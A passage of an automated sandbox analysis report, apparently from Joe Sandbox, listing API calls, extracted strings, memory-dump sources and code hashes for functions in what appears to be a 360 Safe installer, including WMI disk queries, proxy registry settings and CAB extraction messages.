                                                                                                                                                                      • String ID: SCROLLBAR

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001B65AD
                                                                                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 001B65D5
                                                                                                                                                                        • Part of subcall function 001B3197: InvalidateRect.USER32(?,00000000,00000000,?,?,001B0207,?), ref: 001B31AD
                                                                                                                                                                      • GetDlgItem.USER32(?,000003EF), ref: 001B665A
                                                                                                                                                                      • GetDlgItem.USER32(?,000003F1), ref: 001B66B4
                                                                                                                                                                        • Part of subcall function 001AF7D0: SetWindowLongW.USER32(?,000000FC,?), ref: 001AF7F6
                                                                                                                                                                      • GetDlgItem.USER32(?,00000411), ref: 001B66E7
                                                                                                                                                                      • GetDlgItem.USER32(000000FF,000003F6), ref: 001B6774
                                                                                                                                                                        • Part of subcall function 00196C96: SetWindowLongW.USER32(?,000000FC,?), ref: 00196CBC
                                                                                                                                                                      • GetDlgItem.USER32(000000FF,000003EA), ref: 001B67C4
                                                                                                                                                                      • ShowWindow.USER32(?,00000000,000000E5,PNG,00000004,?), ref: 001B680B
                                                                                                                                                                      • GetDlgItem.USER32(000000FF,0000040F), ref: 001B686E
                                                                                                                                                                      • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 001B68A2
                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 001B68B0
                                                                                                                                                                      • GetDlgItem.USER32(000000FF,00000410), ref: 001B68DC
                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 001B6903
                                                                                                                                                                      • GetDlgItem.USER32(000000FF,00000409), ref: 001B6932
                                                                                                                                                                        • Part of subcall function 001B134F: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000006,?,?,00000000,?,?,?,001977F9,0000013F,PNG), ref: 001B13A1
                                                                                                                                                                      • GetDlgItem.USER32(000000FF,000003ED), ref: 001B69D2
                                                                                                                                                                        • Part of subcall function 001B62CA: __EH_prolog3.LIBCMT ref: 001B62D1
                                                                                                                                                                        • Part of subcall function 001B1610: EnableWindow.USER32(?,?), ref: 001B161B
                                                                                                                                                                        • Part of subcall function 001B1610: InvalidateRect.USER32(?,00000000,00000001,?,?,00195AF9,?), ref: 001B162A
                                                                                                                                                                        • Part of subcall function 001B1610: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,00195AF9,?), ref: 001B163C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Item$Window$Show$H_prolog3InvalidateLongRect$EnableMessageRedrawSend
                                                                                                                                                                      • String ID: PNG

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 001D3C04
                                                                                                                                                                      • CoCreateInstance.OLE32(0022C868,00000000,00000001,0022C798,?,00000038,001D4568,?,?,?,?,?,0000001C,001CEAD1,?,?), ref: 001D3C22
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 001D3C71
                                                                                                                                                                      • CoSetProxyBlanket.COMBASE(0017BD49,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 001D3C88
                                                                                                                                                                        • Part of subcall function 001BE782: __EH_prolog3_GS.LIBCMT ref: 001BE789
                                                                                                                                                                        • Part of subcall function 001BE782: _wcslen.LIBCMT ref: 001BE7C4
                                                                                                                                                                        • Part of subcall function 001C573A: SysAllocString.OLEAUT32(?), ref: 001C5751
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 001D3D26
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 001D3D2F
                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 001D3D79
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 001D3E56
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 001D3E5B
                                                                                                                                                                        • Part of subcall function 001D2533: __EH_prolog3.LIBCMT ref: 001D253A
                                                                                                                                                                        • Part of subcall function 001D2533: VariantInit.OLEAUT32(?), ref: 001D2556
                                                                                                                                                                        • Part of subcall function 001D2533: VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 001D256B
                                                                                                                                                                        • Part of subcall function 001D2533: VariantClear.OLEAUT32(?), ref: 001D2589
                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 001D3E98
                                                                                                                                                                      Strings
                                                                                                                                                                      • ROOT\CIMV2, xrefs: 001D3C36
                                                                                                                                                                      • WQL, xrefs: 001D3CF1, 001D3E21
                                                                                                                                                                      • DeviceID, xrefs: 001D3D8B
                                                                                                                                                                      • ASSOCIATORS OF {Win32_DiskPartition.DeviceID='%s'} where ResultClass = Win32_DiskDrive, xrefs: 001D3DF2
                                                                                                                                                                      • Model, xrefs: 001D3EAA
                                                                                                                                                                      • ASSOCIATORS OF {Win32_LogicalDisk.DeviceID='%s'} where ResultClass = Win32_DiskPartition, xrefs: 001D3CC7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: String$FreeVariant$Clear$AllocBlanketChangeCreateH_prolog3H_prolog3_H_prolog3_catchInitInstanceProxyType_wcslen
                                                                                                                                                                      • String ID: ASSOCIATORS OF {Win32_DiskPartition.DeviceID='%s'} where ResultClass = Win32_DiskDrive$ASSOCIATORS OF {Win32_LogicalDisk.DeviceID='%s'} where ResultClass = Win32_DiskPartition$DeviceID$Model$ROOT\CIMV2$WQL
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 5F4F5644
                                                                                                                                                                        • Part of subcall function 5F4F1914: __EH_prolog3.LIBCMT ref: 5F4F191B
                                                                                                                                                                        • Part of subcall function 5F4F1914: GetTickCount.KERNEL32 ref: 5F4F1926
                                                                                                                                                                        • Part of subcall function 5F4F1914: GetTickCount.KERNEL32 ref: 5F4F1930
                                                                                                                                                                        • Part of subcall function 5F4F1914: GetTickCount.KERNEL32 ref: 5F4F1940
                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 5F4F56F7
                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 5F4F5716
                                                                                                                                                                      • _wcslen.LIBCMT ref: 5F4F5775
                                                                                                                                                                      • _wcslen.LIBCMT ref: 5F4F5786
                                                                                                                                                                      • _wcslen.LIBCMT ref: 5F4F5797
                                                                                                                                                                      • _memset.LIBCMT ref: 5F4F583E
                                                                                                                                                                      • _memset.LIBCMT ref: 5F4F5855
                                                                                                                                                                      • _memset.LIBCMT ref: 5F4F586C
                                                                                                                                                                      • _memset.LIBCMT ref: 5F4F590A
                                                                                                                                                                      • _wcslen.LIBCMT ref: 5F4F5949
                                                                                                                                                                      • StrStrIW.SHLWAPI(?,http://,?,?,?,00000000,00000000,000000FF,?,?,?,?,?,0000000C), ref: 5F4F5959
                                                                                                                                                                        • Part of subcall function 5F4F429A: __EH_prolog3.LIBCMT ref: 5F4F42B3
                                                                                                                                                                        • Part of subcall function 5F4F429A: StrStrIW.SHLWAPI(?,file://,00000001,00000000,00000000,00000000,000000FF), ref: 5F4F436A
                                                                                                                                                                        • Part of subcall function 5F4F429A: _wcslen.LIBCMT ref: 5F4F438A
                                                                                                                                                                        • Part of subcall function 5F4F429A: _wcslen.LIBCMT ref: 5F4F4398
                                                                                                                                                                        • Part of subcall function 5F4F429A: _wcslen.LIBCMT ref: 5F4F43AB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcslen$_memset$CountH_prolog3Tick$_wcsncpy
                                                                                                                                                                      • String ID: [Update Ie Proxy] WPAD[%d], Proxy[%s], PAC[%s], DialUp[%d]$http://$http=$socks=
                                                                                                                                                                      APIs
                                                                                                                                                                      • StrCpyW.SHLWAPI(?,?), ref: 00185469
                                                                                                                                                                      • StrCpyW.SHLWAPI(?,?), ref: 00185473
                                                                                                                                                                        • Part of subcall function 001848F2: __EH_prolog3.LIBCMT ref: 001848F9
                                                                                                                                                                        • Part of subcall function 001848F2: GetCurrentThreadId.KERNEL32 ref: 00184980
                                                                                                                                                                      • _strlen.LIBCMT ref: 00185487
                                                                                                                                                                        • Part of subcall function 00182982: __CxxThrowException@8.LIBCMT ref: 001829C2
                                                                                                                                                                        • Part of subcall function 00184E4C: GetCurrentThreadId.KERNEL32 ref: 00184E50
                                                                                                                                                                        • Part of subcall function 0018269D: __EH_prolog3.LIBCMT ref: 001826A4
                                                                                                                                                                        • Part of subcall function 00181BA2: GetStdHandle.KERNEL32(000000F5,?,00185699,0000000C,Extract ERROR: The file is not a valid Cabinet: %s,?,?,?,?,?,0022D4D1,00000000), ref: 00181BA8
                                                                                                                                                                        • Part of subcall function 00181BA2: SetConsoleTextAttribute.KERNEL32(00000000,?,0022D4D1,00000000), ref: 00181BAF
                                                                                                                                                                        • Part of subcall function 00181BA2: _vwprintf.LIBCMT ref: 00181BBE
                                                                                                                                                                        • Part of subcall function 00181BA2: _printf.LIBCMT ref: 00181BC8
                                                                                                                                                                        • Part of subcall function 00183C23: __EH_prolog3.LIBCMT ref: 00183C2A
                                                                                                                                                                        • Part of subcall function 00183C23: FreeLibrary.KERNEL32(?,00000004,0018565F,?,?,?,?,0022D4D1,00000000), ref: 00183C51
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3$CurrentThread$AttributeConsoleException@8FreeHandleLibraryTextThrow_printf_strlen_vwprintf
                                                                                                                                                                      • String ID: CAB Index: %d$CAB filesize: %d Bytes$Extract ERROR: Could not create FDI context:%s$Extract ERROR: Not all files could be extracted:%s$Extract ERROR: The file is not a valid Cabinet: %s$File count in CAB: %d$Folder count in CAB: %d$Has additional header data: %s$Has predecessor in splitted Cabinet: %s$Has successor in splitted Cabinet: %s$Set ID: %d$false$true
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 5F52AB44: __EH_prolog3_catch.LIBCMT ref: 5F52AB4B
                                                                                                                                                                      • GetLastError.KERNEL32(FF4173A1,00000000,?,00000000), ref: 5F4E4FA7
                                                                                                                                                                      • GetLastError.KERNEL32(00000001,FF4173A1,00000000,?,00000000), ref: 5F4E5020
                                                                                                                                                                        • Part of subcall function 5F50BFAE: __EH_prolog3.LIBCMT ref: 5F50BFB5
                                                                                                                                                                        • Part of subcall function 5F50BFAE: _memset.LIBCMT ref: 5F50C152
                                                                                                                                                                      • _memset.LIBCMT ref: 5F4E53F1
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 5F4E54D6
                                                                                                                                                                        • Part of subcall function 5F513F7C: _memset.LIBCMT ref: 5F513FAF
                                                                                                                                                                        • Part of subcall function 5F513F7C: wvnsprintfW.SHLWAPI(?,000003FF,?,?), ref: 5F513FCA
                                                                                                                                                                      Strings
                                                                                                                                                                      • [%d.%3d] , xrefs: 5F4E52EF
                                                                                                                                                                      • ERR_HTTPMGR_DNS_NOT_FINISH, xrefs: 5F4E556F
                                                                                                                                                                      • [%d.] proxy=%d,Errcode = %u(%s), , xrefs: 5F4E5581
                                                                                                                                                                      • [%d.] Start Through FireWall http protocol PickUrl Failed, xrefs: 5F4E509D
                                                                                                                                                                      • [%d.] ErrorCode = %d,, xrefs: 5F4E502D
                                                                                                                                                                      • ERR_HTTPMGR_NOT_IP, xrefs: 5F4E510B, 5F4E552A
                                                                                                                                                                      • [%d.] Errcode = %u(%s), xrefs: 5F4E5122
                                                                                                                                                                      • [%d.] Start Through FireWall http protocol PickIp Failed, xrefs: 5F4E5204
                                                                                                                                                                      • [%d.%3d] ConnectNum = %d, xrefs: 5F4E54F7
                                                                                                                                                                      • [%d.] proxy=%d,Errcode = %u(%s), , xrefs: 5F4E5547
                                                                                                                                                                      • [%d.] ErrorCode = %d , , xrefs: 5F4E4FB4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$ErrorLast$CountH_prolog3H_prolog3_catchTickwvnsprintf
                                                                                                                                                                      • String ID: ERR_HTTPMGR_DNS_NOT_FINISH$ERR_HTTPMGR_NOT_IP$[%d.%3d] $[%d.%3d] ConnectNum = %d$[%d.] ErrorCode = %d , $[%d.] Errcode = %u(%s)$[%d.] ErrorCode = %d,$[%d.] Start Through FireWall http protocol PickIp Failed$[%d.] Start Through FireWall http protocol PickUrl Failed$[%d.] proxy=%d,Errcode = %u(%s), $[%d.] proxy=%d,Errcode = %u(%s),
                                                                                                                                                                      • API String ID: 2301807879-2515552278
                                                                                                                                                                      • Opcode ID: a917909481b316e21f7468959cb6c98c78643f9e9bdbaf3358c55e3e801cf59e
                                                                                                                                                                      • Instruction ID: 50430b682ee7aa2c95e600f01636a789db2ab00a375a6dc4927dcdb078ae4c43
                                                                                                                                                                      • Opcode Fuzzy Hash: a917909481b316e21f7468959cb6c98c78643f9e9bdbaf3358c55e3e801cf59e
                                                                                                                                                                      • Instruction Fuzzy Hash: 9002A1F09017459FEB14DFA4C840BEAB7B6EF44302F00452EE656DB281DB76A954CBA2
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 5F51E732
                                                                                                                                                                        • Part of subcall function 5F4EAE3C: KiUserExceptionDispatcher.NTDLL(406D1388,00000000,00000004,00001000,5F568AA8,00000018,5F51E73E,00000000), ref: 5F4EAE6F
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 5F51E760
                                                                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 5F51E780
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000000), ref: 5F51E788
                                                                                                                                                                      • CreateWindowExW.USER32(00000000,360AsyncNetwork,360AsyncNetwork,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 5F51E795
                                                                                                                                                                        • Part of subcall function 5F51C5B6: SetTimer.USER32(?,00000000,00000064,00000000), ref: 5F51C5D6
                                                                                                                                                                      • SetEvent.KERNEL32(?,00000000), ref: 5F51E7B3
                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 5F51E7C4
                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 5F51E7CE
                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 5F51E7DB
                                                                                                                                                                      • DestroyWindow.USER32(?,00000000), ref: 5F51E7F0
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 5F51E7F7
                                                                                                                                                                      • UnregisterClassW.USER32(360AsyncNetwork,00000000), ref: 5F51E7FF
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule$ClassDispatcherMessageUserWindow$CallbackCreateCurrentDestroyDispatchEventExceptionRegisterThreadTimerTranslateUnregister
                                                                                                                                                                      • String ID: 0$360AsyncNetwork$p2sp.Network
                                                                                                                                                                      • API String ID: 4253188931-2555541505
                                                                                                                                                                      • Opcode ID: 56088b72e2ba8fdd936482d6299a831ca16cb4acc06ca036ff3299506771a68e
                                                                                                                                                                      • Instruction ID: 58e247f0f783c8802a7c40f8af9cb531a00c2bfe336e4b74a67df13362370296
                                                                                                                                                                      • Opcode Fuzzy Hash: 56088b72e2ba8fdd936482d6299a831ca16cb4acc06ca036ff3299506771a68e
                                                                                                                                                                      • Instruction Fuzzy Hash: 1321ACB2D01228ABDB11AFE9C94CDDEBFFCFE49661B10042AF505E7100DB74591A8BA5
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\LiveUpdate360,00000000,000F003F,5F5BC288,00000000,5F57AC78,74DF30D0,?,5F5BC3F0,5F5BC288), ref: 5F516DF2
                                                                                                                                                                      • RegCreateKeyExW.KERNEL32(80000002,SOFTWARE\LiveUpdate360,00000000,00000000,00000000,000F003F,00000000,5F5BC288,?,?,5F5BC3F0,5F5BC288), ref: 5F516E17
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\LiveUpdate360,00000000,000F003F,5F5BC288,?,5F5BC3F0,5F5BC288), ref: 5F516E2D
                                                                                                                                                                      • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\LiveUpdate360,00000000,00000000,00000000,000F003F,00000000,5F5BC288,?,?,5F5BC3F0,5F5BC288), ref: 5F516E4A
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\LiveUpdate360,00000000,00020019,5F5BC3F0), ref: 5F516E71
                                                                                                                                                                      • RegCloseKey.ADVAPI32(5F5BC3F0), ref: 5F516EF4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Open$Create$Close
                                                                                                                                                                      • String ID: Intranet$Neverup$SOFTWARE\LiveUpdate360$customhttp$customproxytype$customsocks$ieproxy$proxytype
                                                                                                                                                                      • API String ID: 744170003-1635914898
                                                                                                                                                                      • Opcode ID: 58947b3343b0b1e7c0c6fa879eb15bd2a84b993e4dde93bd5c7ab9049ea59d35
                                                                                                                                                                      • Instruction ID: 2f40cba9a9986147986108d25b9e704bede8f036f10bfc061efa9ebda3edd4e7
                                                                                                                                                                      • Opcode Fuzzy Hash: 58947b3343b0b1e7c0c6fa879eb15bd2a84b993e4dde93bd5c7ab9049ea59d35
                                                                                                                                                                      • Instruction Fuzzy Hash: C031C9B690110CFFEB119BD5DD48DEFBFBDEF44254F1000BAB545A2011D6316B69EA60
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 5F4FE546
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 5F4FE56A
                                                                                                                                                                      • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 5F4FE5F1
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 5F4FE600
                                                                                                                                                                      • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 5F4FE628
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 5F4FE632
                                                                                                                                                                      • CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 5F4FE64B
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 5F4FE658
                                                                                                                                                                      • CreateSemaphoreW.KERNEL32(00000000,?,?,00000000), ref: 5F4FE67C
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 5F4FE685
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$Create$TimerWaitable$Exception@8H_prolog3_catchMutexSemaphoreThrow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1927663649-0
                                                                                                                                                                      • Opcode ID: d7c3239bd5d02394680b5b159eca421fd19c47a1a27aeb5133065dcda259e46b
                                                                                                                                                                      • Instruction ID: 263350079f56a9a85d5da816351cb09ea1e94ec3795dfc1eb127e28e1bf7deb0
                                                                                                                                                                      • Opcode Fuzzy Hash: d7c3239bd5d02394680b5b159eca421fd19c47a1a27aeb5133065dcda259e46b
                                                                                                                                                                      • Instruction Fuzzy Hash: F46129F1900208DFE724DFB5D9849AEBBF9FB48211B04992EF51AD7740E770A9498F90
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001CEA49
                                                                                                                                                                        • Part of subcall function 001C87F5: _memset.LIBCMT ref: 001C8838
                                                                                                                                                                        • Part of subcall function 001C87F5: __wsplitpath.LIBCMT ref: 001C8845
                                                                                                                                                                        • Part of subcall function 001C87F5: GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001C8874
                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001CEA8E
                                                                                                                                                                        • Part of subcall function 001D2080: InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,001CEAA4,?,0017BD49,00100000,00000000,0000008C), ref: 001D20EE
                                                                                                                                                                      • _memset.LIBCMT ref: 001CEC0A
                                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000026,00000001,00100000,00000000,0000008C), ref: 001CEC1F
                                                                                                                                                                      • PathAppendW.SHLWAPI(?,360\360Safe), ref: 001CEC2D
                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001CEC63
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 001CED12
                                                                                                                                                                        • Part of subcall function 0016DFB0: __CxxThrowException@8.LIBCMT ref: 0016DFC2
                                                                                                                                                                      • _memset.LIBCMT ref: 001CED82
                                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000026,00000001), ref: 001CED94
                                                                                                                                                                      • PathAppendW.SHLWAPI(00000000,360Safe), ref: 001CED9F
                                                                                                                                                                        • Part of subcall function 0018F087: std::_String_base::_Xlen.LIBCPMT ref: 0018F09C
                                                                                                                                                                        • Part of subcall function 0017A8EB: _wcsnlen.LIBCMT ref: 0017A91D
                                                                                                                                                                        • Part of subcall function 001CE951: __EH_prolog3.LIBCMT ref: 001CE958
                                                                                                                                                                        • Part of subcall function 001CE334: __EH_prolog3.LIBCMT ref: 001CE33B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Path$H_prolog3_memset$AppendFolderSpecialUnothrow_t@std@@@__ehfuncinfo$??2@$CountCriticalDiskException@8FreeInitializeSectionSpaceString_base::_ThrowTickXlen__wsplitpath_wcsnlenstd::_
                                                                                                                                                                      • String ID: 360Safe$360\360Safe$:\360Safe
                                                                                                                                                                      • API String ID: 1315137449-2735685471
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001CEF2C
                                                                                                                                                                        • Part of subcall function 001EAF4F: __wcstoi64.LIBCMT ref: 001EAF2C
                                                                                                                                                                      • _memset.LIBCMT ref: 001CEF75
                                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000026,00000000,?,?,00000018), ref: 001CEF94
                                                                                                                                                                      • PathCombineW.SHLWAPI(00000000,00000000,?,360\360Safe,?,?,00000018), ref: 001CEFBB
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?,00000000,?,?,00000018), ref: 001CEFD0
                                                                                                                                                                      • PathIsDirectoryW.SHLWAPI(?), ref: 001CEFDD
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000018), ref: 001CEFEA
                                                                                                                                                                      • PathIsDirectoryW.SHLWAPI(?), ref: 001CF00A
                                                                                                                                                                      • PathIsDirectoryEmptyW.SHLWAPI(?), ref: 001CF017
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 001CF03B
